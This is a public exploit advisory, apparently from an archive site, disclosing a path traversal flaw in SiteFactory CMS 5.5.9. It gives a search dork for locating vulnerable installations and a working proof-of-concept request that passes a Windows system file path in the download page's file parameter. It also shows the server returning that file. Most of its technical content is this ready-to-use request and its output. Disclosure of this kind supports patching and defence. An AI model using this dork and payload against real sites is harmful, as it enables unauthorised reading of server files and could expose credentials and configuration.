SiteFactory CMS 5.5.9 Path Traversal File

2015.08.19
Credit: Guillermo Garcia Marcos
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/sitefactory/assets/

|||||||||||||| [+] Title: SiteFactory CMS 5.5.9 Path Traversal File = \ , [+] Date: [19-8-2015] = | [+] Autor Guillermo Garcia Marcos _= ___/ [+] Vendor: http://www.mindbite.se/ / _\ (o)\ [+] Dork : inurl:/sitefactory/assets/ | | \ _ \ [+] info: The file parameter is vulnerable to path traversal attacks, | |/ (____) enabling read access to arbitrary files on the server. \__/ / | Latest versions can be vulnerable. / / ___) [+] Timeline research: / \ \ _) ) 18-8-2015: Bug found \ \ / ( 19-8-2015: Public disclosure \/ \ \_________/ |\_________________,_ ) \/ \ / | ==== _______)__) \/ \ / __/___ ====_/ \/ \ / (O____)\\_(_/ (O_ ____) (O____) [+]PoC: Request : GET /sitefactory/assets/download.aspx?file=c%3a\windows\win.ini HTTP/1.1 Host: censored-host.com Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: application/octet-stream Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 content-disposition: attachment; filename=win.ini X-Powered-By: ASP.NET Date: Tue, 18 Aug 2015 17:58:14 GMT Content-Length: 92 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 // https://twitter.com/GuilleSec

References:

https://twitter.com/GuilleSec


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top